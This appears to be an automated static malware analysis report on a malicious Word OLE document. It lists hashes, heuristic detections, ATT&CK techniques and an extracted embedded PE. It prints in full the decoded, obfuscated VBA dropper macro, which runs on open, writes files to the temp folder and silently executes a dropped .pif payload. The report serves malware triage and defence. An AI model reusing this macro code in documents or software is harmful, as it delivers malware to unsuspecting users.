Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4c55418e4816f804…

MALICIOUS

Office (OLE)

206.0 KB Created: 2016-03-28 10:58:00 Authoring application: Microsoft Office Word First seen: 2017-10-10
MD5: 56d836883bab20f440ae88e8b118b2e4 SHA-1: b75589fb37b05f752fe71cf2630ad5acaa3e517e SHA-256: 4c55418e4816f8044d55773f4d72be0ed0c2988462d5e6268360d54dfa7aad04
674 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros. The macros leverage `CreateObject` and `Shell` calls to execute an embedded PE executable (`embedded_office_0000984e.exe`). This executable is detected by ClamAV as `BC.Win.Packer.Troll-14`. The VBA code also attempts to create a persistence entry via `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy`.

Heuristics 18

  • OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514
    Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
  • ClamAV: BC.Win.Packer.Troll-14 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: BC.Win.Packer.Troll-14
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Dim wep As Variant
    wep = Shell(jrb, 0)
    End Function
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    VBJASD = "lakjdklashdbjkasn"
    Set bhGdggwSw = CreateObject(YhhrJne(20 + 67) & "ord" + ".Applicatio" + "n")
    bhGdggwSw.Visible = nnff
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    VBJASD = "lakjdklashdbjkasn"
    Set bhGdggwSw = CreateObject(YhhrJne(20 + 67) & "ord" + ".Applicatio" + "n")
    bhGdggwSw.Visible = nnff
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Sub
    Sub AutoOpen()
        BCHJASD = "1';23l'1p2l32 s"
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Function
    Sub Workbook_Open()
        Rewew
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
        Rewew
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    KKLOR = YhhrJne(3 + 90 + wpp)
    OOKRR = Environ$(VGDHE) + KKLOR
    DDVD = "" & "." & ""
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2070 bytes
SHA-256: 6ab78c895cd5d628277ee3e9b75276748ae67e953ccb968cc37013b286a736f0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Loie()
    Rewew
End Sub
Sub Rewew()

Dim nnff As Boolean, wpp As Integer, FJSAD As String


wpp = 7 - 8
VGDHE = UHbdd()
VGDHE = VGDHE & "P"
nnff = False
On Error Resume Next
Dim WOIEW As String
KKLOR = YhhrJne(3 + 90 + wpp)
OOKRR = Environ$(VGDHE) + KKLOR
DDVD = "" & "." & ""
GGIIR = DDVD + "p"
GGIIR = GGIIR & "i" & "f"
DEIBE = DDVD & "rt" & YhhrJne(99 + 3)

FFFNNNF = OOKRR + "nfbd" + DEIBE
SSHHDD = OOKRR & "dsss" + DEIBE
WOIEW = OOKRR + "st1" & GGIIR

Module1.HNbfw (FFFNNNF)
Module1.HNbfw (SSHHDD)

Module1.Nnfhhe
RLKDWD = Environ$(VGDHE) & "\nfbd" & ".rt" & "f"
VBJASD = "lakjdklashdbjkasn"
Set bhGdggwSw = CreateObject(YhhrJne(20 + 67) & "ord" + ".Applicatio" + "n")
bhGdggwSw.Visible = nnff
 bhGdggwSw.Documents.Open (RLKDWD)
Module1.Polkd (2)
HYUASGD = Module1.Pjndw(WOIEW)
Module1.Polkd (3)
bhGdggwSw.Quit
Set bhGdggwSw = Nothing
End Sub
Public Function YhhrJne(wbrw As Integer)
    YhhrJne = Chr(wbrw)
End Function
Public Function UHbdd()
    UHbdd = "T" & "EM"
End Function
Sub Workbook_Open()
    Rewew
End Sub
Sub AutoOpen()
    BCHJASD = "1';23l'1p2l32 s"
    Loie
End Sub

Sub Auto_Open()
    Rewew
End Sub




























Attribute VB_Name = "Module1"
Sub Polkd(Jbse As Long)
poew = 50
Dim Nejw As Long

Dim Tgve As Long
Tgve = Jbse + Timer
Nejw = Tgve
Do While Timer < Nejw
DoEvents
Loop
End Sub
Public Function Pjndw(jrb As String)
Dim wep As Variant
wep = Shell(jrb, 0)
End Function
Sub Nnfhhe()
HVYUWEQ = "qiwoudbqiow dqgjqjwhd"
HVYUWEQ = "qiwoudbqiow dqgjqjwhd"
Polkd (2)
HVYUWEQ = "qiwoudbqiow dqgjqjwhd"
End Sub
Public Function HNbfw(kjrj As String)
ActiveDocument.SaveAs FileName:=kjrj, FileFormat:=wdFormatRTF
End Function
embedded_office_0000984e.exe embedded-pe Office MZ+PE at offset 0x984E 171956 bytes
SHA-256: db3a2e821ad6021450ea00243b15c2bf668940b7576d986ca4a9885be094b216
Detection
ClamAV: BC.Win.Packer.Troll-14
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1520687343/Ole10Native 148172 bytes
SHA-256: fe8dba3bbf003f0a2c6afabab23451a8e7cfed60a4ad7d552b8cbc22817fbf36
Detection
ClamAV: BC.Win.Packer.Troll-14
Obfuscation or payload: unlikely